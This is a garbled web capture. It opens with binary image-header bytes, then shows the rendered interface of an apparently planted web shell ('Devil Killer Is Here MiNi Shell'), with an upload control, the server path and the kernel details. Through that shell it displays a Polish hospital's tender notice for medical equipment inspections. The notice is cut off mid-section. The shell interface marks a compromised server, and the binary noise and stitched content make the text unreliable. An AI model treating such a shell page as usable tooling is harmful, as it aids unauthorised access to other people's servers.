JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251128/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251128/0056247701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Przeglądy aparatury medycznej&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Grochowski im. dr med. Rafała Masztaka Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002153989</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grenadierów 51/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-073</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mziolek@grochowski.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.grochowski.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Przeglądy aparatury medycznej&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-377061cb-4787-4d95-aeea-9e42190560df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00562477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitalgrochowski.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpitalgrochowski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przez środki komunikacji<br/>elektronicznej rozumieć należy środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną.<br/>2. Komunikacja w niniejszym postępowaniu o udzielenie zamówienia między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu środków komunikacji elektronicznej, a w szczególności przy użyciu Platformy Zakupowej<br/>Market Planet OnePlace, zwanej również „platformą” lub „platformą e-Zamawiający”.<br/>3. Platforma e-Zamawiający jest narzędziem umożliwiającym realizację procesu związanego z udzieleniem zamówienia, w<br/>szczególności umożliwia przekazywanie korespondencji, ofert, oświadczeń i dokumentów w formie<br/>elektronicznej.<br/>4. Za datę (dzień, godzinę) przekazania oferty, dokumentu, oświadczenia, wyjaśnienia i innej korespondencji od Wykonawcy uznaje<br/>się datę z jaką powyższe występuje na platformie po stronie Zamawiającego (data<br/>wpłynięcia do Zamawiającego), niezależnie od terminu w jakim Zamawiający zapoznał się z przesłanymi informacjami.<br/>5. Komunikacja z Zamawiającym, dokumentacja postępowania oraz korzystanie z platformy są bezpłatne. Dokonując rejestracji<br/>Wykonawca akceptuje regulamin korzystania z platformy.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy użyciu platformy<br/>opisane zostały w Instrukcji dla Wykonawcy pod adresem: https://szpitalgrochowski.ezamawiajacy.pl lub<br/>https://szpitalgrochowski.ezamawiajacy.pl/servlet/HomeServlet – zakładka „Regulacje i procedury procesu zakupowego / Plany<br/>zamówień publicznych”.<br/>7. Zamawiający informuje o następujących wymaganiach sprzętowo-aplikacyjnych umożliwiających pracę, w tym składanie ofert, na<br/>„Platformie e-Zamawiający”:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s (zalecane szerokopasmowe łącze<br/>internetowe);<br/>2) komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2;<br/>4) zainstalowany program Acrobat Reader, lub inny obsługujący pliki w formacie .pdf.<br/>8. Maksymalny rozmiar przesyłanych plików powinien być mniejszy niż 2 GB.<br/>9. Zamawiający dopuszcza przesyłanie plików i plików zawierających skompresowane dane w następujących formatach: doc, docx,<br/>xls, xlsx, pdf, zip, 7z, XAdES, CAdES. Dopuszczalne są inne powszechnie stosowane formaty, możliwe do odczytania przy<br/>wykorzystaniu standardowego oprogramowania lub oprogramowania dostępnego bezpłatnie.<br/>10. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia (składając zapytanie, wniosek lub ofertę),<br/>akceptuje warunki korzystania z portalu Market Planet OnePlace, określone w Instrukcji dla Wykonawcy oraz zobowiązuje się<br/>korzystając z portalu Market Planet OnePlace przestrzegać postanowień w/w instrukcji.<br/>11. Po wypełnieniu formularza rejestracyjnego Wykonawca otrzymuje e-maila informującego, że może dokonać pierwszego<br/>logowania do ww. platformy.<br/>12. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do systemu. Po wprowadzeniu danych użytkownika tj. adresu<br/>email oraz hasła zgłoszenie jest automatycznie akceptowane przez system.<br/>13. Rejestracja konta następuje automatycznie poprzez:<br/>1) podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym);<br/>2) kontakt z numerem telefonu podanym w potwierdzeniu;<br/>3) jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie.<br/>Konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>14. Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia 2016/679 („RODO”),<br/>Zamawiający informuje że:<br/>1. Administratorem Pani/Pana danych osobowych jest Szpital Grochowski im. dr med. Rafała Masztaka Sp. z o.o. z siedzibą w<br/>Warszawie (04-073) przy ul. Grenadierów 51/59;<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się państwo kontaktować w sprawach związanych z<br/>przetwarzaniem danych osobowych za pośrednictwem poczty elektronicznej na adres iod@grochowski.waw.pl ;<br/>3. Pani/Pana dane osobowe przetwarzane są na podstawie art. 6 ust. 1 lit. c RODO w zw. z art. 275 pkt. 1 ustawy Pzp, czyli na<br/>podstawie obowiązku prawnego Szpitala wyboru najkorzystniejszej oferty spośród ofert złożonych w odpowiedzi na ogłoszenie o<br/>zamówieniu;<br/>4. Dane osobowe mogą być udostępnione innym podmiotom na podstawie przepisów prawa<br/>(np. gdy wystąpi o nie sąd, Krajowa Izba Odwoławcza), a także uprawnionym podmiotom, w związku z realizacją usług na rzecz administratora (np. dostawca oprogramowania);<br/>5. Pani/Pana dane osobowe będą przechowywane przez 4 lata od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a termin ten jest wymagany przez art. 78 ust. 1 ustawy Pzp;<br/>6. Podanie danych osobowych jest niezbędne do skutecznego złożenia oferty;<br/>7. Przysługuje Pani/Panu prawo dostępu, sprostowania, usunięcia, wniesienia sprzeciwu oraz przeniesienia swoich danych<br/>osobowych przetwarzanych przez administratora. W przypadku naruszenia przetwarzania, ma Pan/i również prawo wniesienia skargi<br/>do Prezesa Urzędu Ochrony Danych Osobowych;<br/>8. Skorzystanie z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia 2016/679 („RODO”),<br/>Zamawiający informuje że:<br/>1. Administratorem Pani/Pana danych osobowych jest Szpital Grochowski im. dr med. Rafała Masztaka Sp. z o.o. z siedzibą w<br/>Warszawie (04-073) przy ul. Grenadierów 51/59;<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się państwo kontaktować w sprawach związanych z<br/>przetwarzaniem danych osobowych za pośrednictwem poczty elektronicznej na adres iod@grochowski.waw.pl ;<br/>3. Pani/Pana dane osobowe przetwarzane są na podstawie art. 6 ust. 1 lit. c RODO w zw. z art. 275 pkt. 1 ustawy Pzp, czyli na<br/>podstawie obowiązku prawnego Szpitala wyboru najkorzystniejszej oferty spośród ofert złożonych w odpowiedzi na ogłoszenie o<br/>zamówieniu;<br/>4. Dane osobowe mogą być udostępnione innym podmiotom na podstawie przepisów prawa<br/>(np. gdy wystąpi o nie sąd, Krajowa Izba Odwoławcza), a także uprawnionym podmiotom,<br/>w związku z realizacją usług na rzecz administratora (np. dostawca oprogramowania);<br/>5. Pani/Pana dane osobowe będą przechowywane przez 4 lata od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a termin ten jest wymagany przez art. 78 ust. 1 ustawy Pzp;<br/>6. Podanie danych osobowych jest niezbędne do skutecznego złożenia oferty;<br/>7. Przysługuje Pani/Panu prawo dostępu, sprostowania, usunięcia, wniesienia sprzeciwu oraz przeniesienia swoich danych<br/>osobowych przetwarzanych przez administratora. W przypadku naruszenia przetwarzania, ma Pan/i również prawo wniesienia skargi<br/>do Prezesa Urzędu Ochrony Danych Osobowych;<br/>8. Skorzystanie z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPK/105/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 88750,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 – Wirówka LC-24 oraz Urządzenie do suchego rozmrażania preparatów krwiopochodnych Sahara III;<br/>1. Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1120,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – Respirator NPB 840;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – Angiograf Allura FD10;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 25000,00 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = 